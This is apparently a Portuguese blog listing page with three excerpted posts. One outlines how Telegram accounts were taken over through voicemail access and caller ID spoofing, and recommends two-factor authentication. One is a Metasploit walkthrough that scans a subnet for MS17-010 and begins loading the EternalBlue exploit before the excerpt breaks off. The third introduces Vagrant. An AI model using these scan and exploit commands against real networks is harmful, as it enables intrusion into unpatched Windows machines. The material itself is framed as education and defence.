Postagens

Celular hackeado (Telegram)

PREMISSA: TODO CONTEUDO ABAIXO SERVE APENAS PARA FINS ACADÊMICOS E ENTENDIMENTO DO QUE ACONTECEU COM O "CLONE" DA LINHA.

Celular hackeado (Telegram)

SIM Swap

Operação Spoofing

Objetivo
Acessar as contas de Telegram das vitimas

Procedimento de login
1. numero de telefone que envia um SMS vai acessar o login
2. caso falhe receber uma ligação

Acessar as caixas postais das vitimas

Ligar para seu próprio numero

Caller ID Spoofing ** esse e o cara!!! Camuflagem do remetente
-->

Manipulação de uma informação dentro da telefonia

Caller ID (identificativo de quem esta ligando)

Software VOIP

Deixar o telefone ocupado

DEIXAR CLARO QUE:
1. Falha foi das operadoras (sem senhas) acesso a caixa postal;
2. Telegram das vitimas (não acessou os dados do celular);

O que fazer para me proteger?
Ativar a autenticação de dois fatores

Varredura na Rede (para detectar o eternalblue)

Olá para darmos continuidade ao ano de 2020, hoje vou demostrar a varredura em sua Rede para detectar o eternalblue.


A premissa que vou considerar que você já tem em seu virtualbox é um kali linux atualizado
https://www.kali.org/downloads/



Comandos dentro do Kali Linux
# service postgresql start

# msfconsole
msf5 > search smb_ms17_010
msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > show options
msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.1.0/24
msf5 auxiliary(scanner/smb/smb_ms17_010) > set THREADS 100
msf5 auxiliary(scanner/smb/smb_ms17_010) > run

Quando a vulnerabilidade for identificada teremos a saida
"Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x86"

msf5 auxiliary(scanner/smb/smb_ms17_010) > back
msf5 > search ms17_010_eternalblue
msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payloa…

Conhecendo o Vagrant

Imagem
Olá hoje vamos falar de um assunto muito importante para você sysadmin ou desenvolver que precisa de agilidade.
O Vagrant é um projeto que permite virtualizar o ambiente de desenvolvimento de forma simples.
Premissa ter um bare metal (VirtualBox, Vmware, Hypervisor) https://www.virtualbox.org/ (é o que eu utilizo no dia a dia)

Site Vagrant para Download
https://www.vagrantup.com/downloads.html

Download pela própria distribuição Linux (de boa preferência eu estou usando o Debian Buster 10)
$ sudo apt-get install vagrant -y

Vagrant Box (maquinas prontas)

Criar um diretório (de sua preferência onde vai criar suas vm's)

Para instalar os boxes (Discover Vagrant Boxes)
$ vagrant box add centos/7 (com esse comando ele vai instalar o centOS)